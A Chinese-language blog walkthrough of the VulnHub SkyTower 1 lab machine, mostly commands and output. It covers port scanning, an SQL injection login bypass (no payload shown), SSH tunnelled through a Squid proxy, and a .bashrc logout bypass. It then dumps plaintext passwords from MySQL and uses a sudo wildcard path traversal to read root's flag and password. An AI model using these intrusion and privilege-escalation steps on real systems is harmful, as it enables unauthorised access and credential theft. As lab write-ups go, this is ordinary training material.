Walkthrough-SkyTower 1

0x01 环境

靶机地址：
https://www.vulnhub.com/entry/skytower-1,96/

0x02 过程

1.信息收集

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# netdiscover -r 192.168.60.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                             
                                                                                                                           
 16 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 960                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.60.95   08:00:27:54:4a:37      1      60  PCS Systemtechnik GmbH

端口开放情况

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# nmap --min-rate 10000 -p- 192.168.60.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-16 03:00 EDT
Nmap scan report for SkyTower (192.168.60.95)
Host is up (0.000080s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds

2.思路

访问80端口，发现登录窗口

尝试sql注入，进行绕过后成功登录

发现页面进行提示，账户密码，以及ssh登录
john:hereisjohn

直接ssh登录，发现无法登录

根据扫描出来的3128端口，发现是squid代理服务器，于是尝试通过代理进行ssh登录

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# vim /etc/proxychains4.conf


http 192.168.60.95 3128

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.60.95:3128  ...  192.168.60.95:22  ...  OK
john@192.168.60.95's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 16 03:29:37 2023 from 192.168.60.95

Funds have been withdrawn
Connection to 192.168.60.95 closed.
                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95 "id"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.60.95:3128  ...  192.168.60.95:22  ...  OK
john@192.168.60.95's password: 
uid=1000(john) gid=1000(john) groups=1000(john)
                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95 "ls -al"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.60.95:3128  ...  192.168.60.95:22  ...  OK
john@192.168.60.95's password: 
total 24
drwx------ 2 john john 4096 Jun 20  2014 .
drwxr-xr-x 5 root root 4096 Jun 20  2014 ..
-rw------- 1 john john    7 Jun 20  2014 .bash_history
-rw-r--r-- 1 john john  220 Jun 20  2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20  2014 .bashrc
-rw-r--r-- 1 john john  675 Jun 20  2014 .profile
                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95 "mv .bashrc .bashrc.bak"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.60.95:3128  ...  192.168.60.95:22  ...  OK
john@192.168.60.95's password: 
                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95                         
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.60.95:3128  ...  192.168.60.95:22  ...  OK
john@192.168.60.95's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 16 03:29:55 2023 from 192.168.60.95
john@SkyTower:~$

可以使用ssh后发现，会话会立即中断，但可以通过ssh执行命令，于是将会话设置移除后，获得了完整的shell

翻找文件，发现数据库配置的账户密码

john@SkyTower:~$ ls /var
backups  cache  lib  local  lock  log  mail  opt  run  spool  tmp  www
john@SkyTower:~$ ls /var/www
background2.jpg  background.jpg  index.html  login.php
john@SkyTower:~$ cat /var/www/login.php
<?php

$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

if($db->connect_errno > 0){
    die('Unable to connect to database [' . $db->connect_error . ']');

}

登录数据库，发现其他账户密码，登录sara账户

john@SkyTower:~$ mysql -uroot -proot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 63
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| SkyTech            |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

mysql> use SkyTech;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from login;
+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | john@skytech.com    | hereisjohn   |
|  2 | sara@skytech.com    | ihatethisjob |
|  3 | william@skytech.com | senseable    |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

mysql> exit
Bye
john@SkyTower:~$ su sara
Password: 

Funds have been withdrawn
john@SkyTower:~$ exit
logout
Connection to 192.168.60.95 closed.
                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh sara@192.168.60.95 "mv .bashrc .bashrc.bak"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.60.95:3128  ...  192.168.60.95:22  ...  OK
sara@192.168.60.95's password: 
                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh sara@192.168.60.95                         
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.60.95:3128  ...  192.168.60.95:22  ...  OK
sara@192.168.60.95's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 08:19:23 2014 from localhost
sara@SkyTower:~$

发现存在可使用的sudo命令，并存在路径通配符问题，于是成功拿到flag.txt，查看到root密码

sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$ sudo ls /accounts/../root -al
total 36
drwx------  4 root root 4096 Jun 20  2014 .
drwxr-xr-x 24 root root 4096 Jun 20  2014 ..
drwx------  2 root root 4096 Jun 20  2014 .aptitude
-rw-------  1 root root  204 Jun 20  2014 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rwx------  1 root root   69 Jun 20  2014 flag.txt
-rw-------  1 root root  268 Jun 20  2014 .mysql_history
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
drwx------  2 root root 4096 Jun 20  2014 .ssh
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:~$ su root
Password: 
root@SkyTower:/home/sara# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:/home/sara#

posted @ 2023-05-16 15:57 Jarwu 阅读(25) 评论(0) 编辑收藏举报

刷新页面返回顶部

405 Method Not Allowed

很抱歉，由于您访问的URL有可能对网站造成安全威胁，您的访问被阻断。

Walkthrough-SkyTower 1

0x01 环境

0x02 过程

1.信息收集

2.思路

公告